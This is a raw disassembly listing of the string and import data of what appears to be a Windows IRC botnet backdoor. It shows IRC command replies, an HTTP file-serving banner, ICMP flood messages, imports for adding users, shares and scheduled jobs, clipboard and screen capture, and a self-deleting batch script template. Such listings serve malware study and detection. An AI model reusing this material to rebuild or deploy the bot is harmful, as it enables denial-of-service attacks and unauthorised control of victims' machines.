aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_404BCC+D3�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_404BCC+97�o
; sub_410E85+1AE�o
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_404BCC+83�o
align 4
; char aApplicationOct[]
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_404BCC:loc_404C31�o
align 4
aTextHtml db 'text/html',0 ; DATA XREF: sub_404BCC+5E�o
align 10h
; char aHttpdFailedT_0[]
aHttpdFailedT_0 db '[HTTPD]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_404D4E+28F�o
align 4
; char aHttpdWorkerThr[]
aHttpdWorkerThr db '[HTTPD]: Worker thread of server thread: %d.',0
; DATA XREF: sub_404D4E+20B�o
align 4
; char asc_420028[]
asc_420028: ; DATA XREF: sub_404D4E+157�o
unicode 0, <*>,0
; char asc_42002C[]
asc_42002C: ; DATA XREF: sub_404D4E+FB�o
; sub_404FFE+29�o ...
dw 0Ah
unicode 0, <>,0
; char aSS[]
aSS db '%s%s',0 ; DATA XREF: sub_404D4E+EA�o
; sub_404FFE+4CA�o ...
align 4
; char aS_2[]
aS_2 db '%s',0 ; DATA XREF: sub_404D4E+3A�o
; sub_405E64+3B�o ...
align 4
aS_6 db '\%s',0 ; DATA XREF: sub_404D4E+2F�o
; char aFoundIFilesAnd[]
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_404FFE+64E�o
align 4
; char aTrTdColspan3_0[]
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_404FFE+633�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 10h
; char aPrivmsgSFoundS[]
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_404FFE+618�o
align 10h
; char a31s21sIBytes[]
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_404FFE+589�o
align 4
; char aTdTdWidthDCo_0[]
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_404FFE+561�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
; char aCodeSCodeA_0[]
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_404FFE:loc_405516�o
align 4
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_404FFE+511�o
align 4
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_404FFE+471�o
align 4
; char a31s21s[]
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_404FFE+434�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_404FFE+401�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
; char aCodeSCodeA[]
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_404FFE:loc_4053C0�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_404FFE+3BB�o
align 4
; char aSS_2[]
aSS_2 db '%s%s/',0 ; DATA XREF: sub_404FFE+374�o
align 4
; char aTrTdWidthDAHre[]
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_404FFE+330�o
; sub_404FFE+486�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
; char aPrivmsgS31s21s[]
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_404FFE+30E�o
align 4
; char aS_3[]
aS_3 db '<%s>',0 ; DATA XREF: sub_404FFE+2E4�o
; sub_404FFE+413�o
align 10h
; char a2_2d2_2d4d2_2d[]
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_404FFE+2BA�o
aAm db 'AM',0 ; DATA XREF: sub_404FFE+290�o
align 4
aPm db 'PM',0 ; DATA XREF: sub_404FFE+285�o
align 4
; char a__0[]
a__0 db '.',0 ; DATA XREF: sub_404FFE+24D�o
align 4
; char a__[]
a__ db '..',0 ; DATA XREF: sub_404FFE+232�o
align 10h
; char aTrTdColspan3AH[]
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_404FFE+1C0�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
; char aSearchingForS[]
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_404FFE+147�o
; char aTrTdColspan3Hr[]
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_404FFE+12B�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
; char aTrTdWidthDCode[]
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_404FFE+F7�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
; char aH1IndexOfSH1Ta[]
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_404FFE+AD�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
; char aHtmlHeadTitleI[]
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_404FFE+78�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
; char aPrivmsgSSearch[]
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_404FFE+4B�o
; char aSSHttp1_1Refer[]
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_40576B+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
; char aIcmpDoneWithSF[]
aIcmpDoneWithSF db '[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/s'
; DATA XREF: sub_40588C+397�o
db 'ec (%dMB).',0
; char aIcmpErrorSendi[]
aIcmpErrorSendi db '[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Return'
; DATA XREF: sub_40588C+307�o
db 'ed: <%d>.',0
align 4
; char aIcmpInvalidTar[]
aIcmpInvalidTar db '[ICMP]: Invalid target IP.',0 ; DATA XREF: sub_40588C+12A�o
align 4
; char aIcmpErrorSetso[]
aIcmpErrorSetso db '[ICMP]: Error: setsockopt() failed, returned: <%d>.',0
; DATA XREF: sub_40588C+C2�o
; char aIcmpErrorSocke[]
aIcmpErrorSocke db '[ICMP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_40588C+49�o
; char aIdentdErrorSer[]
aIdentdErrorSer db '[IDENTD]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_405C73+16E�o
; char aUseridUnixS[]
aUseridUnixS db ' : USERID : UNIX : %s',0Dh,0Ah,0 ; DATA XREF: sub_405C73+113�o
; char aIdentdClientCo[]
aIdentdClientCo db '[IDENTD]: Client connection from IP: %s:%d.',0
; DATA XREF: sub_405C73+BB�o
; char aSSS[]
aSSS db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_405E64+58�o
; char aPrivmsg[]
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_405E64+16�o
; sub_409557+607�o
; char aNotice[]
aNotice db 'NOTICE',0 ; DATA XREF: sub_405E64+F�o
; sub_409557+613�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_405EFF+B8C�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_405EFF+B7F�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_405EFF+B72�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_405EFF+B65�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_405EFF+B58�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_405EFF+B50�o
align 10h
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_405EFF:loc_406A42�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_405EFF+B0E�o
align 4
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_405EFF+B06�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_405EFF:loc_4069F8�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_405EFF+AB4�o
align 10h
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_405EFF+AA7�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_405EFF+A9A�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_405EFF+A92�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_405EFF:loc_406984�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_405EFF+A50�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_405EFF+A48�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_405EFF:loc_40693A�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_405EFF+A06�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_405EFF+9FE�o
align 4
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_405EFF:loc_4068F0�o
align 10h
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_405EFF+974�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_405EFF+967�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_405EFF+95A�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_405EFF+94D�o
align 10h
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_405EFF+940�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_405EFF+933�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_405EFF+926�o
align 10h
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_405EFF+919�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_405EFF+90C�o
align 4
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_405EFF+8FF�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_405EFF+8F7�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_405EFF:loc_4067E5�o
align 4
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_405EFF+8A9�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_405EFF+89C�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_405EFF+894�o
align 4
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_405EFF:loc_406786�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_405EFF+85A�o
align 4
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_405EFF+7E8�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_405EFF+7DB�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_405EFF+7CE�o
align 10h
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_405EFF+7C1�o
align 4
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_405EFF+7B4�o
align 4
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_405EFF+7A7�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_405EFF+79A�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_405EFF+78D�o
align 10h
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_405EFF+780�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_405EFF+778�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_405EFF:loc_406666�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_405EFF+62E�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_405EFF+621�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_405EFF+614�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_405EFF+607�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_405EFF+5FA�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_405EFF+5ED�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_405EFF+5E0�o
align 10h
aAccept db 'accept',0 ; DATA XREF: sub_405EFF+5D3�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_405EFF+5C6�o
align 10h
aSelect db 'select',0 ; DATA XREF: sub_405EFF+5B9�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_405EFF+5B1�o
align 10h
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_405EFF+59F�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_405EFF+592�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_405EFF+585�o
align 4
; char aSend[]
aSend db 'send',0 ; DATA XREF: sub_405EFF+578�o
; sub_409557+1AC4�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_405EFF+56B�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_405EFF+55E�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_405EFF+551�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_405EFF+544�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_405EFF+537�o
align 10h
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_405EFF+52A�o
align 4
aConnect db 'connect',0 ; DATA XREF: sub_405EFF+51D�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_405EFF+510�o
aSocket db 'socket',0 ; DATA XREF: sub_405EFF+503�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_405EFF+4F6�o
align 4
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_405EFF+4E9�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_405EFF+4DC�o
align 10h
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_405EFF+4CF�o
align 10h
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_405EFF+4C2�o
align 10h
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_405EFF+4B5�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_405EFF+4AD�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_405EFF+49C�o
align 4
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_405EFF+429�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_405EFF+41C�o
align 10h
aBitblt db 'BitBlt',0 ; DATA XREF: sub_405EFF+40F�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_405EFF+402�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_405EFF+3F5�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_405EFF+3E8�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_405EFF+3DB�o
align 10h
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_405EFF+3CE�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_405EFF+3C6�o
align 10h
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_405EFF:loc_4062B4�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_405EFF:loc_40628C�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_405EFF+335�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_405EFF+328�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_405EFF+31B�o
align 10h
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_405EFF+30E�o
align 10h
aControlservice db 'ControlService',0 ; DATA XREF: sub_405EFF+301�o
align 10h
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_405EFF+2F4�o
align 10h
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_405EFF+2E7�o
align 10h
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_405EFF:loc_4061DE�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_405EFF+2AF�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_405EFF+2A2�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_405EFF:loc_406199�o
align 4
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_405EFF+252�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_405EFF+245�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_405EFF+238�o
align 4
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_405EFF+22B�o
align 4
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_405EFF+21E�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_405EFF+216�o
align 4
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_405EFF:loc_406104�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_405EFF+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_405EFF+193�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_405EFF+186�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_405EFF+179�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_405EFF+16C�o
align 4
aIswindow db 'IsWindow',0 ; DATA XREF: sub_405EFF+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_405EFF+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_405EFF+14A�o
align 10h
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_405EFF:loc_406034�o
; ___crtMessageBoxA+D�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_405EFF:loc_406007�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_405EFF+A0�o
align 10h
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_405EFF+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_405EFF+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_405EFF+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_405EFF+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_405EFF+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_405EFF+52�o
align 10h
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_405EFF+45�o
align 10h
aProcess32first db 'Process32First',0 ; DATA XREF: sub_405EFF+38�o
align 10h
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_405EFF+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_405EFF+23�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_405EFF+A�o
align 4
; char aMainDllTestCom[]
aMainDllTestCom db '[MAIN]: DLL test complete.',0 ; DATA XREF: sub_406AE8+2BE�o
align 4
; char aOdbc32_dllFail[]
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_406AE8+298�o
; char aShell32_dllFai[]
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_406AE8+264�o
align 4
; char aMpr32_dllFaile[]
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_406AE8+230�o
align 4
; char aIphlpapi_dllFa[]
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_406AE8+1FC�o
align 10h
; char aDnsapi_dllFail[]
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_406AE8+1C8�o
; char aNetapi32_dllFa[]
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_406AE8+194�o
align 4
; char aIcmp_dllFailed[]
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_406AE8+160�o
align 4
; char aWininet_dllFai[]
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_406AE8+12C�o
align 4
; char aWs2_32_dllFail[]
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_406AE8+F8�o
; char aGdi32_dllFaile[]
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_406AE8+C4�o
align 4
; char aAdvapi32_dllFa[]
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_406AE8+90�o
align 4
; char aUser32_dllFail[]
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_406AE8+5C�o
; char aKernel32_dllFa[]
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_406AE8+28�o
align 4
; char aSErrorSD_[]
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_40703D+72�o
align 4
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_407102+5�o
; sub_40F995+18�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_407184+1C�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_407228+2�o
; char aComspecCSS[]
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_40724A+140�o
align 10h
; char a[]
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_40724A+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
; char aSdel_bat[]
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_40724A+48�o
align 10h
off_4210E0 dd offset aAdd ; DATA XREF: sub_4073D2+6D�r
; sub_4077B6+50�r ...
; "Add"
off_4210E4 dd offset aAdded ; DATA XREF: sub_4073D2+2D�r
; sub_4077B6+82�r ...
; "Added"
dword_4210E8 dd 0 ; DATA XREF: sub_4073D2+18�r
dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 8
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 10h
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 421154h, 42114Ch, 2, 421140h, 421134h, 3, 746E6F43h
dd 65756E69h, 64h, 746E6F43h, 65756E69h, 0
aPaused_0 db 'Paused',0
align 4
aPause_0 db 'Pause',0
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: .data:00421114�o
aStop_0 db 'Stop',0 ; DATA XREF: .data:00421110�o
align 4
aStarted db 'Started',0 ; DATA XREF: .data:00421108�o
aStart_0 db 'Start',0 ; DATA XREF: .data:00421104�o
align 4
aListed db 'Listed',0 ; DATA XREF: .data:004210FC�o
align 4
aList_1 db 'List',0 ; DATA XREF: .data:004210F8�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: .data:004210F0�o
aDelete_0 db 'Delete',0 ; DATA XREF: .data:004210EC�o
align 4
aAdded db 'Added',0 ; DATA XREF: .data:off_4210E4�o
align 4
aAdd db 'Add',0 ; DATA XREF: .data:off_4210E0�o
; char aNetSNoServiceS[]
aNetSNoServiceS db '[NET]: %s: No service specified.',0 ; DATA XREF: sub_4073D2+74�o
align 4
; char aNetErrorWithSe[]
aNetErrorWithSe db '[NET]: Error with service: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_4073D2+55�o
; char aNetSServiceS_[]
aNetSServiceS_ db '[NET]: %s service: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_4073D2+38�o
align 4
; char aAnUnknownErr_0[]
aAnUnknownErr_0 db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_4074FB+12C�o
align 10h
; char aTheSystemIsShu[]
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_4074FB:loc_407613�o
align 10h
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_4074FB:loc_40760C�o
align 4
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_4074FB:loc_407605�o
db 'the state of the service.',0
align 10h
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_4074FB:loc_4075FE�o
align 4
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_4074FB:loc_4075F7�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_4074FB:loc_4075F0�o
align 10h
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_4074FB:loc_4075E9�o
align 10h
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_4074FB:loc_4075E2�o
align 4
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_4074FB:loc_4075DB�o
db 'marked for deletion.',0
align 4
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_4074FB:loc_4075D4�o
align 4
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_4074FB:loc_4075A9�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_4074FB:loc_4075A2�o
db ' the service.',0
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_4074FB:loc_40759B�o
db 'tServiceCtrlDispatcher.',0
align 10h
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_4074FB:loc_407594�o
align 10h
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_4074FB+8F�o
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_4074FB:loc_407569�o
db 'dependent on it.',0
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_4074FB:loc_40755F�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_4074FB:loc_407555�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_4074FB:loc_40754B�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_4074FB:loc_407541�o
align 10h
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_4074FB+3C�o
align 4
; char aSSS_0[]
aSSS_0 db '%s: %s (%s)',0 ; DATA XREF: sub_407679+EB�o
; char aStopped[]
aStopped db ' Stopped',0 ; DATA XREF: sub_407679:loc_407745�o
aStarting db ' Starting',0 ; DATA XREF: sub_407679:loc_40773E�o
aStoping db ' Stoping',0 ; DATA XREF: sub_407679:loc_407737�o
aRunning db ' Running',0 ; DATA XREF: sub_407679:loc_407730�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_407679:loc_407729�o
aPausing db ' Pausing',0 ; DATA XREF: sub_407679:loc_407722�o
aPaused db ' Paused',0 ; DATA XREF: sub_407679:loc_40771B�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_407679+9B�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_407679+25�o
align 4
; char aNetSNoShareSpe[]
aNetSNoShareSpe db '[NET]: %s: No share specified.',0 ; DATA XREF: sub_4077B6+AB�o
align 4
